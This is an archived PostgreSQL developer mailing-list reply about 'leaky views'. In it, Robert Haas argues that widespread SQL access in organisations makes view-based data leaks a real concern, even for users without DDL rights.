| From: | Robert Haas <robertmhaas(at)gmail(dot)com> |
|---|---|
| To: | Greg Stark <gsstark(at)mit(dot)edu> |
| Cc: | Tom Lane <tgl(at)sss(dot)pgh(dot)pa(dot)us>, KaiGai Kohei <kaigai(at)kaigai(dot)gr(dot)jp>, KaiGai Kohei <kaigai(at)ak(dot)jp(dot)nec(dot)com>, Itagaki Takahiro <itagaki(dot)takahiro(at)gmail(dot)com>, Heikki Linnakangas <heikki(dot)linnakangas(at)enterprisedb(dot)com>, pgsql-hackers(at)postgresql(dot)org |
| Subject: | Re: leaky views, yet again |
| Date: | 2010-10-05 18:49:43 |
| Message-ID: | AANLkTimFyf8ekmM4sQ8tMWLn10w8SYwEo0XZ0jZAzSZC@mail.gmail.com |
| Views: | Raw Message | Whole Thread | Download mbox | Resend email |
| Thread: | |
| Lists: | pgsql-hackers |
On Tue, Oct 5, 2010 at 2:08 PM, Greg Stark <gsstark(at)mit(dot)edu> wrote:
> Though I find it unlikely the sales people would have direct access to
> run arbitrary SQL -- let alone create custom functions.
I have definitely seen shops where virtually everyone has SQL-level
access to the database. Several of them. Most of them were pretty
insecure, but it certainly doesn't help anything when the database has
no capability to do anything better. Now, I will grant you that not
everyone in those organizations was actually smart enough to do
meaningful things with the access they had, but I never found that
very comforting.
> If the users that have select access on the view don't have DDL access
> doesn't that make them leak-proof for those users?
Depends what they can do with pre-existing, or built-in, functions.
--
Robert Haas
EnterpriseDB: http://www.enterprisedb.com
The Enterprise Postgres Company
| From | Date | Subject | |
|---|---|---|---|
| Next Message | Tom Lane | 2010-10-05 18:59:27 | Re: patch: SQL/MED(FDW) DDL |
| Previous Message | Tom Lane | 2010-10-05 18:48:08 | Re: leaky views, yet again |